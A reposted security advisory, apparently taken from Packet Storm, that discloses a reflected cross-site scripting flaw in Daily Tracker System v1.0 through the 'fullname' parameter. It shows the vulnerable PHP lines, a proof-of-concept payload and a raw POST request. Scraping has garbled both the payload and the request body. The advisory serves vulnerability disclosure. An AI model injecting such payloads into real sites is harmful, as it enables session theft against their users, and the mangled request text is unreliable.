Daily Tracker System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on August 1st, 2020 📆 | 7423 Views ⚑


Daily Tracker System 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Daily Tracker System v1.0 – Reflected Cross Site Scripting
# Exploit Author: Adeeb Shah
# Date: July 30th, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link:
# Version: v1.0
# Tested On: Windows 10 Pro (x64) + XAMPP

# Vulnerability Details:
# The value of the fullname request parameter is copied into the value of
an HTML tag attribute which is encapsulated in double quotation marks. The
payload rwsg6″>x88n2 was submitted in the fullname
parameter. This input was echoed unmodified in the application’s response.
This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application’s response.

# Vulnerable Source Code
# ./user-profile.php
# 11 $fullname=$_POST[‘fullname’];
# ./includes/sidebar.php
# 21

< ?php echo $name;

# POST /dets/user-profile.php HTTP/1.1

Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Cookie: PHPSESSID=atvmfd664osgggvtcoc4scv9vs

[email protected]

Source link

Tagged with:

Leave a Reply

Your email address will not be published. Required fields are marked *